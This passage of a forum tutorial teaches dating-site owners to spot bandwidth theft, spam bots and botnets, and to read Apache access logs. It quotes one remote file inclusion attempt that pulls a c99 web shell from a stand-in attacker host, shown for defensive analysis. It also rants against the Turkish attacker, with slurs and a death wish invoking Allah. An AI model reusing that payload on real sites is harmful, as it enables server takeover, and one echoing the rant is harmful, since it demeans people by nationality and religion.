|
|
|
Welcome to AllAboutDatingSites - aeDating & Dolphin Dating Technical Solutions. We hope your visit with us will enable you to make better informed decisions about enhancing and managing your Dating Site or Social Networking business.
You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other great features including our Technical Articles, Tips & Tricks and other valuable Content. By joining our FREE community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely FREE. So, PLEASE do something good for yourself. Join our community today! You will be glad you did. By the way, did we forget to mention, this site will save you a pile of$$$ ABSOLUTELY! If you have any problems with the registration process or your account login, please feel free to contact us. |
|
|||||||
| Tutorials Your tutorials mean a lot to newcomers especially, please share your experience here. |
![]() |
|
|
Submit Tools | Thread Tools | Display Modes |
|
|
#1 |
|
Administrator
|
Bandwidth Bandits - A True Story & Tutorial
Who is stealing your bandwidth or worse, do you know?
This tutorial will help you find out if bad guys are stealing your bandwidth and how to stop them. In the following page, we will give you a little background information, describe some of the common ways your bandwidth is used and abused, and provide some practical suggestions of the things you can do to prevent the abuse and help to curtail malicious activity by hacker badguys who would happily destroy your entire site without a single hesitation, just for fun! Introduction In the following pages, we will identify some of the bad guys, their targets of abuse and some of the methodology they use to steal your bandwidth. Then we will give you some examples of practical things you can do to identify and analyze your bandwidth usage and show you some procedures you can use to curtail the abuse. By the end of this tutorial, if you READ it - don't just scan it and apply the examples and instructions to your own site, you will be able to look at your log files and be able correctly interpret the information. Using this newly acquired skill, you will be able to accurately access the threats to your site and effectively write procedures to prevent bad guys from accessing your system. You will be able to measure the success of your effort and avoid much of your bandwidth from evaporating into hyperspace. In addition to analyzing and providing responses to your analysis, you will be able to develop and implement proactive solutions to prevent hostile requests from gaining access to your system based on banning IP addresses and known signatures of badguys. You will also be able to detect and prevent hotlinker from hijacking the media on your site and you will be able to use multiple techniques to prevent spambot, site downloaders, email harvesters, content ripoff artists, media thieves and other badguys from illegally stealing bandwidth and content without your permission. Finally, you will be able to development and execute a proactive long term plan to protect your online property and stop the thieves from executing their illegal activity on your site and stealing your bandwidth. Caveat: #1 All of the examples used in this tutorial come from real systems and work there. Most, if not all of them have been "sanitized" to present this paper and generally will not work in another system without modifications to customize them for a different site. Do not just "copy and paste" them and expect them to run as listed, they will not work! #2 All of the examples presented can be optimized to execute more efficiently. We present them in the spirit of instruction to the beginner and not as a product "deliverable" from an expert source. #3 All of the research for this document came from search engine lookups and that can be easily verified vendor websites (like apache.org), related public forums and personal experience. Some effort has been made to avoid as much as possible, plagiarizing any material presented, though a disturbing amount of "identical" information being posted by different entities from obviously the same source is ubiquitous on the net has been noted (unfortunately this was true in some of the print versions we found as well). The second disturbing fact in the research is that very little information about this topic is current even though the reality is "in your face" everyday not very much is being published about it. In any event, the examples presented here are either our original work or believed to be in public domain. Let's begin. How the following chronicle evolved is relevant to becoming aware that badguys are everywhere on the net and you don't have to sit and "wait" for them to find you. You can definitely do things proactively to protect your site and the thieves from stealing your stuff online. A couple of months ago, we had huge problems with our hosting being abruptly terminated by the service we were using, or to be more precise, they were shutdown because they didn't pay their suppliers. As a result, our services suffered a succession of disruptions and at one point all of our services were shutdown completely as well. This initial problem lead to a succession of unpleasant events including an aggravating annoyance with registering for a service at HostGator which allowed us to get about half of the systems transferred and configured when we discovered that the whole service for which we had legitimately paid a year in advance was abruptly and rudely terminated (by them). Having no manners, worse, bad manners, they made no attempt to notify us of any problem, just pulled the plug and terminated the whole service. Ultimately, we found out that their sales department is grotesquely incompetent. Apparently, they are too stupid to realize that "international" operations such as ours might have offices all over the world which we do and that IP addresses outside of the US are not necessarily bad guys, but that's another story for another time. In the process, the "red flagged" our legitimate credit card so we were unable to use it for anything. Stick with us, its all related, we promise! Playing it safe, or so we thought, we decided to go with the provider that helped bail us out during the mess with our defunct hosting company. They provided an opportunity for us to recover all or our backup files and kept our operation up and running while the fiasco was in progress. The fact that they were using an "offshore" operation to provide support was not disclosed or known when we signed up for the service. We soon found out, however, and in fact, at first, this was not an issue but within a week or so when bad things started to happen, we discovered that it mattered a great deal. As the drama unfolded, the problems that surfaced quickly exposed the fact that they were clearly ill equipped to resolve the configuration incompatibilities between their server and our operating requirements. Security and access issues started to surface, big time. For example, all of our Captcha security scripts were broken because they could not write to the temp folders. If we enabled the write permissions, it would work once and the system would reset them to read only again. Unfortunately, if they don't work, none of the forms work, including user registration. Instead of fixing their configuration problem, they blamed our script for the bad behavior. Ultimately, we were compelled to make yet another move to a different hosting service but before this happened, we got our first lesson about botnets and hacker badguys! Keep in mind, up to this point in time, we never had a hacker or spambot problem in spite of the fact that our operation has been running for several years with no incidents. During our second attempt to get our services back up and running with the "offshore operation", they needed to move our files to a new server under their control. At this time, we noticed problems with permissions on the new server and were sorting them out when all of a sudden, almost within minutes after all our files were moved to a different server, one of our aedating sites was attacked by a hacker from Turkey. This was a known bad boy with evil intentions. He was an include file injection to try to gain direct access to the server and ultimately to the files system where the secure data is kept. We were forewarned about the hacker from Turkey and we had already plugged the hole in our code that he needed to use for his assault. So, when he attacked, were prepared and it wasn't an issue for us or our code but it was a serious issue for the "offshore" people who had no idea about injection attacks and perceived it as a catastrophic event. For a time, they actually shut the server down in the hopes that the Bad Boy from Turkey would go away. In truth, it did "look" like huge problem as the hacker was using an automated tool that "pounded" our site with a copious number of attempts from a huge number of different IP address, all bogus! Thankfully but not surprisingly, all of them failed to gain access to our system. The reason the attempt failed is that the "vulnerability" had previously reported by many of the security watchdogs and we, just a few weeks before, had closed the hole that allowed the exploit. You should be aware that this attacker was/is not just some high school kid playing games, this Turkish Bandit was looking for financial information (and anything else he could find on the server) for bad purposes. We examined one of the scripts that the bad guy referenced in his attack and it contained instructions to download all of the log files and history from the server. In addition, the script provided the bad guy with shell access to the exploited system which would have allowed access to the file system including the security access information. As you know, some of these files contain details about merchant accounts and other sensitive financial information. Have no doubt about it! This dude is a bank robber, one account at a time! While we were doing analysis of our log files, we noticed that the bad boy from Turkey wasn't the only thief in our midst. We found also that our images were being ripped off too without our permission, some by robot (mostly) and we even noticed an "offline browser" that attempted to download the whole site. Also, we saw that we were getting many hundreds of hit by several IP addresses from known Nigerian scammers and spammers even though the registration rate for them had been very minimal (probably because we promptly and summarily dispatch them during the approval loop - this is still bandwidth consumption with no ROI for sure). During the attack, we clearly recognized the service provider support team's inability to solve our access problems and respond appropriately to real threats to our system security. The solutions they offered made no sense. They knew nothing at all about server side scripting, PHP or how web applications worked. They very obviously had no experience dealing with bad guys, so we forced to move to yet another service provider. Our new hosting service has an open source product called webalizer installed and in fact it is a pretty good analysis tool to tell you where your bandwidth is going and identifies the hogs by IP address. If you have webalizer installed on your system, you should check it out. You are sure to be surprised if you have not recently or never looked at your site statistics generated from your log files. If your site is anything like ours, you will see a huge number of hits from robots you never knew existed. You might wonder how they found your site. You might even wonder whether or not you registered with them and don't remember it. Well, the short answer is NO, none of the above! Most certainly, you didn't register for them to be downloading your site or filling your forms up with SPAM or trying to hack your site. They are on your site because they are programmed to be there and their scripts are usually automated by unscrupulous people who are in the business of ripping off what ever they can from the internet in any way they can. To top it all off, they almost always do it invisibly using forged credentials. For simplicity, we assume bandwidth is "data transfer" measured in bytes over some period of time, usually by the month. Generally, at least from a hosting perspective, bandwidth is the amount of data that goes back and forth between your server and the visitors to your site. It is determined by the size of your website, the number of visitors you receive and the type of content and services your site provides. Almost all hosting service plans have bandwidth limitations. If you use more than your plan allows, you should expect to be billed for the extra usage. A good analogy for your hosting bandwidth would be the typical cell phone model where incoming and outgoing traffic combine to get a total consumption rate, everything gets counted! In fact, in most hosting services, you purchase a plan to include a certain amount of bandwidth per month. If you go over the limits of your plan, you can expect to get charged an additional fee for the excess bandwidth consumption, just like you would if you exceeded the call limits on your cell phone. So, what are some of the ways that your bandwidth can be ripped off? Hotlinking. One of the most pervasive ways of stealing bandwidth is by a concept known as Hotlinking. This is a really bad practice where your excellent content, media or both have a "life" outside of your site. Without your knowledge and most certainly without your permission, bad guys link directly to your content and/or media, promote their own site agenda, generate huge amounts of ad revenue from using your content and return nothing to you other than sucking up a large chunk of your bandwidth resources. The way it works is this, the bad guy build a shell and fills it up with adsense, banners, and other affiliate advertising that he will get paid for if they get hit. For the content, he basically copies what's on your site (maybe even downloads if from your site) and points the images and media directly to your site resources. Of course, this means every time the bandwidth thief gets a visitor to their site, that visitor's browser hits your server for the hotlinked resources and your bandwidth counter get charged for it. So, if the site stealing your bandwidth gets a lot of traffic, you could be in a lot of trouble with your host owing them $$$ for resources you didn't use. Forms and Blog Comment Spamming and Injection Attempts Although Email use to be the vehicle of choice for spam distribution, Forms and Blogs have also become favorite targets for spammer who shotgun sites with junk and use automated harvesting programs in an attempt to find new email targets, all in the hope that they will generate new respondents to the junk they deliver. In addition to flooding the internet with junk to maintain their "responder" rates, spammers sell email lists. When you reply to a spammer, you verify that your email address is "deliverable". This makes your address valuable to the spammer, since deliverable addresses sell for a higher price. So, you might (or might not) stop receiving spam from that particular spammer, but you are very likely to start receiving junk mail from countless other spammers. Spammers will use any form they can find on your site to try to get you to respond to them so they can confirm your email address, contact forms, add-a-link forms, blog comment forms, whatever they can find. So, the important thing is DO NOT RESPOND to them. No matter how good it might feel after you flame them, resist the temptation. If you reply, they have your address and now they know it is a working address. Blog comment spam is another Google affectation! Because Google has placed a high value on blogs as an authoritative resource, Spammers have figured out how to covert that into revenue. Comment spam provides instant "credibility" the therefore higher PR since Blogs is heavily valued in the Google page rank algorithm. The higher ranking translates directly into more "customers" for the spammer. The spammers were exploiting the fact that open comment forums let bloggers post HTML for free. Basically, comment spam comes in two flavors. First is automated spam - comments by programs (or bots) that trawl the web looking for comment forms and fill them out. The second type is manual spam - these are the spammer professionals - real people trawling the web and posting spam themselves - and this is often the most difficult to beat. So, here is how it works if done by a professional spammer. They actually read the blog article, then they post a comment related to the article. They might even use real names. The URLs that they post to their websites are not commercial domains. They don't set off any red flags with Google and end up with a domain that has a high Google Page Rank. Then they add their commercial websites to it to bump up their page ranks. The automated spammers depend on scripts and programs to shotgun as many blog sites as they can find in as short a period of time as possible. Historically, they used automated scripts and/or robots to "crawl the web" for targets but as you will see in the following section, evolution has made the game much more sophisticated and the rules for operation are much more complicated. Bad Bots, Botnets, Botnet Gangs and Zombie Recruits Spammers have figured out how to get a lot of bang for no bucks! Recently, we have noticed that either spammers have taken lessons from hackers or hackers have turned spammers because they are using "botnets" now. Botnets are the latest "Plague" to hit the internet. A botnet is a network of compromised machines that can be remotely controlled by an attacker. Botnets exploit huge numbers of "unprotected" computers on the internet by infecting them with specialized viruses that allow the bad guys to "take over" the system and use it to their own advantage. They can access and remotely control the infected systems to provide a virtually invisible playing field to carry on their nefarious activities. Detection is almost impossible and the owners of the compromised system have no clue their computer has been enlisted to serve another master. Some of these botnets and spambots also use forms and blog comment fields to try to find "open door" vulnerabilities in the system and to see if their code can actually get into the system. This, of course, may have nothing at all to do with the message they are submitting in fact that might be completely incoherent, save for some possibly having some have bits of code in them to test the access to the system. Another favorite target is "unprotected" or "unverified data" email forms. They are using automated methods to do injection attacks to gain system level access to computers on the net that allows them free, almost invisible operation through some unsuspecting site that has been compromised. With this new protection against efforts to shut them down and a lot more automated distribution tools, they are relentless in their effort to flood the internet with their junk, routing their e-mail through computers owned by unsuspecting Net users, making it almost impossible to track down and stop the real "herbal Viagra" sellers. Determining the difference between a hacker trying to find vulnerabilities in a system and a botnet executing its list of instructions is almost impossible today. The bad guys are all using similar, if not the same, scripts to perpetrate their illegal activity. However, the botnets (also known as a zombie army) are the vehicle of choice today for most attacks Again, most of the computer owners are completely unaware that their systems have been set up to forward transmissions (including spam or viruses) to other computers on the Internet. In this scenario, the zombie machine is effectively being used now as a computer "robot" or "bot" that serves the wishes of some master spam or virus originator. Most computers compromised in this way are home-based. Estimates of the numbers of computers infected and recruited range now in the millions worldwide. According to a Symantec Internet Security Threat Report, through the first six months of 2006, they found 4,696,903 active botnet computers. With numbers like this, you can easily see how the entire internet has been negatively impacted recently by botnet gangs, not to mention the hundreds and thousands of additional spam messages showing up in your email box of late. The botnets can easily send millions of emails from hundreds of thousands of computer all over the globe with totally impunity whenever it suits them (or more to the point, whenever they need to recharge their bank accounts). Aside from completely wiping out your available bandwidth and then some, here are the top 10 key reasons (according to Code:
Content visible to registered members only. Please Click Here To Register Distributed Denial-of-Service Attacks Botnets are infamous for shutting down sites with shotgunning so much junk and traffic to a server that it can not function and ultimately just shuts down. Many times these attacks are in response to a specific event, like filing an abuse report against them or "playing with them" for example, using a provocative message in your custom spam trap or using some other script to "engage" the badguys, NOT a good idea! Spamming We all know what this is and its impact on our reality. Something you maybe didn't know is that some of the botnets are capable of generating SOCKS proxies that allow their zombie bots to be invisible while conducting their nefarious activities and yet some other botnets can easily run scripts to harvest email-addresses. So, you can see the botnets have many faces and more often than not the spam you are receiving was sent from, or through via proxy, an old Windows computer sitting in a home, maybe not even being used or only used occasionally. Botnets, of course, can also be used to send phishing-mails since phishing is a special case of spam as well. Sniffing Traffic This is one of the most disturbing discoveries about the botnets. Bots can also use a packet sniffer to watch for interesting clear-text data passing by a compromised machine. The sniffers are mostly used to retrieve sensitive information like usernames and passwords as well as banking and financial information including credit and debit card data. But the sniffed data can also contain other interesting information. Keylogging Although this form of attack is a client side phenomenon, it is very distressing to know that most bots also offer keystroke capture features. With the help of a keylogger it is very easy for an attacker to retrieve sensitive information. An implemented filtering mechanism (e.g. "I am only interested in key sequences near the keyword 'paypal.com'") further helps in stealing secret data. Consequently, if you think about it for a minute, this keylogger runs on thousands of compromised machines in parallel you can imagine how quickly and easily PayPal accounts can be harvested. Spreading New Malware Almost all, if not all, bots have the capability of self replication. Bots can easily be used to generate new bots. This is quite simple since all bots implement mechanisms to download and execute a file via HTTP or FTP. Consider also if you will the case of spreading an email virus using a botnet. A botnet with 10,000 zombie hosts can easily act as the start base for the mail virus campaign that can be devastatingly effective. DO NOT OPEN THOSE ATTACHMENTS! Installing Adware and Browser Helper Objects (BHOs) This is another feature that has a client side perspective, at least in part. Botnets are routinely used to gain financial advantages, (this is one of the biggest money makers for them now). This works by setting up a fake website with some advertisements: The operator of this website negotiates a deal with some hosting companies that pay for clicks on ads. With the help of a botnet, these clicks can be "automated" and orchestrated such that thousands of bots can click on the pay per click pop-ups. This process can be further enhanced if the bot hijacks the start-page of a compromised machine so that the "clicks" are executed each time the victim uses the browser. Google AdSense Abuse A similar abuse is also possible with Google's Adsense program: AdSense offers companies the possibility to display Google advertisements on their own website and earn money this way. The company earns money due to clicks on these ads, for example per 10,000 clicks in one month. An attacker can abuse this program by leveraging his botnet to click on these advertisements in an automated fashion by thousands of bots and thus artificially increments the clicks counter on the targeted PPC. This kind of usage for botnets is relatively simple to deploy and nearly impossible to detect with a cleaver randomizing program. Attacking IRC Chat Networks Yet another client side issue that is especially popular among attackers is the so called "clone attack": In this kind of attack, the controller orders each bot to connect a large number of clones to the victim IRC network. The victim is flooded by service request from thousands of bots or thousands of channel-joins by these cloned bots. In this way, the victim IRC network is brought down - similar to a DDoS attack. Manipulating Online Polls/Games Online polls/games are getting more and more attention and it is rather easy to manipulate them with botnets. Since every bot has a distinct IP address, every vote will have the same credibility as a vote cast by a real person. Online games can be manipulated in a similar way. Currently we are aware of bots being used that way, and there is a chance that this will get more important in the future. Mass Identity Theft Using combinations of the different functionality described above can be used for large scale identity theft, one of the fastest growing crimes on the Internet. Bogus emails ("phishing mails") that pretend to be legitimate (such as fake PayPal or banking emails) ask their intended victims to go online and submit their private information. DO NOT DO IT! Without exception, ALL of the online merchant accounts emphatically and unequivocally state they NEVER make requests for ANY personal financial information over the internet! The fake emails are generated and sent by bots via their spamming mechanism. These same bots can also host multiple fake websites pretending to be Ebay, PayPal, or a bank, and harvest personal information. Just as quickly as one of these fake sites is shut down, another one can pop up. The resource is literally inexhaustible and quite flexible. In addition, keylogging and sniffing of traffic can also be used for mass identity theft. As horrific and cataclysmic as this might sound, it is not. Spammers are not really that clever. They are now and always have been opportunistic. The reason they are able to get over is that the door has been left open for them. They use resources that have been left unprotected or simply unmonitored. Much of this clandestine and illegal activity can easily be stopped. At least on the server side, simply adding appropriate filters to scripts, verifying all user data and applying access control techniques can go a long way to preventing the bad robots from accessing your site. Stopping the botnets from recruiting unprotected Home PCs is a mammoth problem. Solving this problem is quite beyond the scope of this document and indeed one that has the best minds in the field baffled. If they haven't figured it out by now, you can bet, the solution isn't going to come any time soon. Next to an honest to goodness hacker break in, probably, bad bots represent the most serious threat to bandwidth consumption and/or site security for the small business website owner/operator. Bad bots come in an assortment of styles and functions but they ALL do the same thing, suck up your resources. Unfortunately, not all bots are bad and some of them you actually NEED. So, detecting the bad one from the good one is a challenge that you need to sort out as quickly as possible when dealing with them. The good guys are easier to manage for sure as they pay attention to the content of the robots.txt file that you should have in your root folder to instruct them where they can and can not go on your site. The Bad Bots generally don't care what's in the robots.txt file. They have their own agenda for what they think is important for them on your site. Aside from stealing your bandwidth, some of these bad bots actually steal your whole site, generally not for a good reason and certainly not to make your life better. These Site Download bots are hyped and sold as "Offline Browsers" with the arguable justification that you can down load the whole site so you can analyze it "offline" in a more convenient location or when you don't have access to the internet. They also claim that these downloaders are useful for development effort for "synching" data. Unfortunately, bad bots come in many different styles and flavors. Therefore, in order to launch an effective campaign to protect your bandwidth, you need to understand who they are and basically what they do. Fortunately, you have a great resource partner, the search engines. Do a search for "bad bot" and you'll find various lists, most written by web site owners who've noticed some strange behavior among the many bots visiting their sites. Although the The definition of a "bad bot" would vary depending on who you ask, there are various behaviors that can be/are considered bad: Trying to use robots.txt for bad bots that either don't read robots.txt or disobey it won't work, so you'll have to use other methods against them. Although some bad bots change both their User Agent and IP address, using one or the other (or both) to ban these bots remains an easily implemented solution. If you want more advanced methods, do a search for "robot trap".ignoring robots.txt To summarize the worst of the worst, you should be aware of each of the following bad bots descriptions when doing your research on what to look for in your log files. Site Downloading Bots or Offline Browser Bots. If you do a search for this type of robot, you will literally find hundreds of links to products that will download your entire site including all images and other media. As has been mentioned previously, these products are hyped as something that you should or may want to do on a regular basis so that you can, for example, do analysis or research "offline" or you might want to use them for doing maintenance of your website. Well, maybe! But that is certainly not how the bad guys use these tools. Many reports can be found on the internet of sites that were attacked by one of these bots and their whole site was reproduced intact under a different domain name and functioning as a competitor for the same customers. In addition to that these bots will waste bandwidth, server resources and slow down your site while they are doing the dirty deed. Media Harvesting Bots. These bots are actually sold for the express purpose of downloading media from the internet which can certainly include any that might be on your site. Here is what the hype from go!zilla (now Bulletproof FTP) says on their myspace.com site, "BulletProof FTP is a fully automated FTP client, with many advanced features including automatic download resuming, leech mode, ftp search and much more. Perfect for personal or corporate Webmasters as well as for Software and Music traders." Web sites using an abundance of Multimedia or Graphics content to sell their product or service are prime targets and abused daily by users of software such as this one. 1000's upon 1000's of users are harvesting movies, sounds, images and other media directly from web sites without even visiting the web site or viewing the advertisements and products for which the content was provided to promote. Media bots simply crawl over your site and download any and all media types they have been instructed to find. Users of this and similar software packages never see your site so any opportunity of generating any revenue from them is completely impossible. These are potentially the most harmful to you and your overall bandwidth consumption as the size of these files can get pretty massive depending on the type of media you have stored on your system. Media bots waste bandwidth and steal your content with no benefit to your whatsoever and only the negative value of sucking up your bandwidth. Email Harvesting Spam Bots. These bots are the bad guys that almost everybody has heard about and knows from practical experience. Email "Spam" bots crawl your web site searching email addresses to be used for spam. In their simplest form, e-mail harvesting bots are simple programs that crawl websites trying to pick out e-mail addresses. Usually, the code that generates e-mail addresses on websites follows a very specific format using mailto: tag. By picking out this code, it's easy for the bots to find e-mail addresses on a website. Spammers have surprisingly sophisticated scripts now capable of instructing the email harvesting bots to do search engine queries for common terms used in their target market. For example, "computers" or "internet" or more recently "stock quotes" could be good search terms. The email harvesting bots would then go and search the major search engines for these terms. The search engine returns a list of pages that match those terms to the email harvester bots. Now that the e-mail harvester bots have a list of pages to analyze, it "visits" those pages and picks out all the e-mail addresses. As a bonus win fall, the typical e-mail harvester will also look for all the links on each of the pages, follow the links, and look for even more e-mail addresses and links! By searching for just a few terms, the e-mail harvester bots could look through many thousands - even millions of web sites, and get millions of current e-mail addresses. These bots are a complete waste of bandwidth and server resources offer no benefit to site owners. These should always be blocked. Notice that we have changed all the spelling on "bot" from singular to plural. This is because email harvesting bots are now very likely to be entities of "botnets" described earlier. Surveillance Bots. All of the "spy bots" fall into this category. Some have the capability of real time monitoring. Many of these bots have very specific targets like finding copyright violation which is a bit weird that they are using an illegal activity to find an illegal activity but that's how life in the bots world, full of ambiguity. Some of these bots are specifically engineered to gather information for various purposes of which your website does not necessarily receive any benefit. Typical commercially available Surveillance bots scours the Internet for news on topics chosen by its customers. The cost of these services can run anywhere from $500 a month to several hundred thousand dollars depending upon the service and the client requirements. For the most part, these high priced services are more targeted toward corporate competitive analysis and gathering corporate intelligence. Other bots, like eWatch, according to prnewswire, "you can immediately track your print and online media coverage plus monitor portals and public discussion areas on the Internet. Clients use eWatch to monitor public reputation, rumors, stock manipulation and insider trading." Not a surprise, but eWatch calls their surveillance bots a "Monitoring Tool" - well, let's think about this for a second, a rose is a rose even if you call it a tulip! Aside from these described bots, you can find a quite a large number of surveillance bots to do just about any kind of monitoring you can imagine, both commercially available and freeware as well. As we know, surveillance bots have a duality that is troublesome. They are blatantly promoted by distributors and the companies who produce them as legitimate and useful software tools while on the other hand we know that the real problem with them is when they are misused and abused and end up in your log files and you have not clue what they are doing there or why. Depending on the type of website you have, you can see how these types of bots could be a disaster on your bandwidth, particularly if they were to come visiting with any regularity at all. So, what can we do about this problem? In a word - Plenty! The first thing you need to do is lose the "but I'm not technical" crutch and you will find out that doing what need to do to manage this problem is a lot simpler than you thought! For sure, the best tool you have to identify the bandwidth robbers on your site are the log files on your server. Generally, the two logs that you should be most interested in keeping track of your bandwidth activity are your error log and your access log. These two files contain most of the information you need to start tracking down the bad guys on your system. You can pretty much think of your access log file as a "sign in sheet" for anyone visiting your site. Basically, the log file tells you where your visitors came from, if they were referred and what pages they visit while on your site. It will also tell you about their activity, for example, if they tried to submit one of your forms or tried to go someplace they should not, like the "includes" folder on your system. If they tried to "inject" something into one of your include files, you will see that in your log files too. Your error log files provide similar and very often complimentary information that help you "see" what has been happening in your server for whatever period of time you happen to be analyzing. As mentioned, you probably have a log analysis tool in your control panel but we are going to use the raw log data in the following section to explain the meaning of each of the components so that you will clearly understand its content and be able to use it to protect your site. So, what's in the log file? Every communication between a client browser and your Web server results in an entry in the server's log to record the transaction. A busy Web site can generate hundreds or even thousands of log entries per hour. Although the data captured in the log file can vary according to the type of server used, what directives are used to define the LogFormat and the individual preferences of the system manager, most hosting companies have a tendency to go with the "combined" format. The two common types of formats use the following directives to create them: LogFormat "%h %l %u %t \"%r\" %>s %b" common LogFormat "%h %l %u %t \"%r\" %>s %b" \"%{Referer}i\" \"%{User-agent}i\"" combined All of our log file examples will use the "combined" log file format for demonstration and because that is what is used on our hosting service. The timeframes for displaying "current" log data may vary somewhat, again according to the requirements of the system manager who configured the server. If your server is configured to archive, say every hour, then you might be better off to choose one of the archives to start your analysis. Although you can analyze an hours worth of data at a time, you will find that at least a complete days worth of information will be more efficient and easier to manage. For example, one access to our site will fill up a single screen because it accesses about a hundred icons to display the page. You can imagine what a task this is to sift through to find the actually steps used by the visitor to track their movement. Once you move off the index page, the order of access is quite easy to distinguish and plainly visible, however. Most, if not all, historical data is stored in compressed format, usually .gz which is easily extracted with your favorite compression utility. Again, as with the live data, the amount of data and the time frame contained in each file can vary from server to server depending on its configuration. In general, a log file entry contains the following: On a side note, all of the data available from a log file can be compiled and combined in various ways; we are using the "combined" format in our examples so it will be providing statistics or listings such as:- the IP address of the computer requesting the file - Number of requests made ("hits")One of the "seems like" drawbacks to doing log file analysis is that it is reactive by nature. You can only respond "after the fact" and you should realize that all of the information you are evaluating is "historical" and therefore limited in its usefulness in thwarting real time attacks on your system. However, the information is extremely useful in planning and implementing your strategy for future protection because bad guys typical are not that bright, creativity is not on their radar screen at all and so they use the SAME tactics over and over which mean that you can indeed prevent future attacks based on historical data. By the way, if you are on windows, notepad does not display the access logs that well so you should wordpad instead as it displays correctly and handles the larger log file better than notepad as well. The display is important because you need each line to be in a separate row without wordwrap enabled, makes for easier analysis. For example, the following is a line from an actual log file. Notice when it wraps, it looks like a bit of a hodgepodge. However, this does not prevent us for using this line for analysis as you will see shortly. The following snippet is taken from an actual log file and is a real injection attempt to "break in" our system by a known hacker (sanitized for security). 81.215.94.10 - - [01/Nov/2006:10:05:26 -0500] "GET /inc/design.inc.php?dir[inc]=http://thebadguyspartnerincrime.com/c99.txt? HTTP/1.1" 200 60 "-" "Opera/9.01 (Windows NT 5.1; U; tr)" Most hosting services have the log files available in the "control panel" you use to do site maintenance. In cPanel, the information is stored in two places, the error log and the raw log. To access the raw log, which is actually the file you need, you simply down load it, unpack it and change the name of the file from .com to .txt if you are running on windows because it thinks all .com files are executables. Okay, so let's take a look at the data and see if we can figure out what going on with it. This particular record was selected because it actually is an attempted "injection" attack from a live system by a bad guy from Turkey (who, by the way, is mindlessly wiping out significant numbers of unprotected AED systems on the internet for no apparent reason other than the moron can, he replaces the whole system with a moronic graphic representation of a Turkish National Flag made up of binary digits with a nonsense tirade written in Turkish on the bottom half of the display, this character is definitely from the shallow end of the gene pool where ever he may be hiding out. Apparently this is a classic manifestation of what happens when you have problems and fail miserably at potty training. He is vicious and incredibly infantile and probably has more than a few brain cells missing or short circuited. Perhaps, if he if he could get to hang out with Allah sooner than later, he might get the justice he richly deserves for his cowardly and destructive behavior). Moving on to the analyis of the request, we see the first component is called remotehost, and maybe the most important piece of data in the request. It is the IP address of the incoming request. This is an indispensable piece of information you need to find out who or where the call initiated (well sometimes). Scammers and Spammer can be pretty cleaver in this regard because it is pretty easy to "fake" an IP address or use a proxy or other devices to conceal what your real IP address is but we will put that discussion aside for the time being. In the next two components, you see two dashes (- -). Each of these dashes means that some piece of information was not submitted. The first dash is the component known as remote logname is the logname of the remote user. This field is almost always, if not, always blank. In fact a request with data in this component would be very rare indeed. The second dash is in the component called authuser and is suppose to contain the contents of the Authenticated User Name which again is normally blank. The fourth piece of data is called, what the surprise, the date. It contains the date and time of the submission relative to the GMT. So this information not only tells you what time the request was submitted, it also tells you the time zone where the server resides. The fifth component is called the request. A request line has three parts, separated by spaces: a method name, the local path of the requested resource, and the version of HTTP being used. In our example, we have the GET method, the URL of the file that was requested and finally the protocol version. Method names are always in UPPER case and you will see in your log files that this can be GET, POST and HEAD. GET, by far, is the most common method you will see in your log files followed by POST and HEAD. The POST method is used to send data to the server to be processed in some way, like by a PHP or CGI script, Forms would be a good example that frequently using the POST method. This is important to note because it gives you clues as to what is going on with your system, what files are being requested, what forms are being accessed and how. The HEAD method asks the server to return the response headers only. You will see this in your log file when a robot like InternetSeer is checking to see if the system is alive and accessible or not, for example. The next component in the request, number six if you are counting, is the status flag. This contains the error or status code generated by the request. The list of codes is pretty short for the possible conditions that can be returned to a request. Here is a summary of the most common codes used today: Message Quick Reference:200 OK, the request completed successfully By far and away, the 200 OK success codes are the most common code you will see in your log file and the list above is most useful if you have a single record you are analyzing. On the other hand if you wished to know if you had a lot of 404 error codes, you could absolutely do a search to find them in your raw log file, however, you may want to check your error log instead. Doing a search for space404space in your standard text editor will produce too many false positives to be useful, though it will certainly find them if you are persistent.1xx indicates an informational message only The seventh component in the list is bytes. Obviously, this is the size (in bytes) of the document returned to the client. No big revelations here. You will notice in our example, the number of bytes is 60 which is the size of the message block that was returned to the bad guy from the script, nothing outrageous but a message to let him know his attempted hack was busted! They didn't actually execute anything through the include file because it was prevented from doing so by a function that monitors access and prohibit any direct call it. Number eight in the list is called the referrer. This important piece of information tells you where the visitor came from if they were on another site or page immediately before they accessed the current page. If you have an affiliate program or link partnership, this could be important to your in terms of measuring how productive your partners are in sending visitors to your site and which links are working for you and by their absence which ones are not. It will also show which pages in your site visitors are surfing so you can pretty much get a picture about how effective your content is in attracting visitors to explore your site's content if that's important to you. If your visitors came to you via a search from one of the search engines, you will see that in your log file too. Notice that our example does not have a referrer listed as it only contains the ubiquitous "-" in its place. In reality, while you are perusing your log files, you will find that most of your hits will not contain a referrer. In fact, in a recent analysis of 500 records, only 40% of them contained a referrer which maybe a typical example. Finally, we have number nine in our survey which is called the agent. This component contains information about the User-Agent HTTP request header. It includes information about the client's browser, for example, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7)". Generally speaking, the User-Agent is the identifying information that the client browser reports about itself, its normally comprises the Browser Name, Mozilla (code name for Netscape), the Browser Version: 5.0, the Browser Language: en-US (US English), and the Browser Operating System: WinNT 5.1. Sometimes hardware platform and other version specifications are included as well. The rv: is the release version of the browser, in this case 1.7.7. By the way, you should keep in mind that many browsers allow the user to change their reported name, so you might see some obvious fake names in the listing. So, now that we have covered all of the components in the log record, you are able to identify all the important elements of the submitted request by name and you are able to explain what each of the pieces of data references why it matters in the log file. Okay, so now that we know what's in the log file, big deal! What now? The fact is that you can use most of this information to start shutting down some of the craziness that is making your bandwidth go through the roof! Notice that we say, "some of the craziness" because we are dependent on the data that is sent to us for our action plan and it isn't always correct. In other words, bad guys lie! So, even though we have an IP address that we can block, we are not guaranteed that this is the real bad guy's address, indeed, more likely than not it is a forgery, as the whole record may be as well. BUT, we have a starting point and we can use it to prevent a repetitive attack on our system which bad guys are quite likely to do. For example, you may see an attack from several different IP addresses but the attack content is the same. We can block for the attack instead of the IP address and simply block the IP address as a matter of routine in case it is used again but blocking the attack should work no matter what IP address is specified. Note: The following solutions assume your site is hosted on an Apache web server (indeed this whole document makes the same assumption), that the mod_rewrite module is enabled, and requires the use of an .htaccess file. If mod_rewrite is not enabled, we provide alternative solutions but again, specifically for the Apache web server. The "blocking mechanism" is called .htaccess. It is available on all Apache Server systems and is a very effective access control method. .htaccess is a file 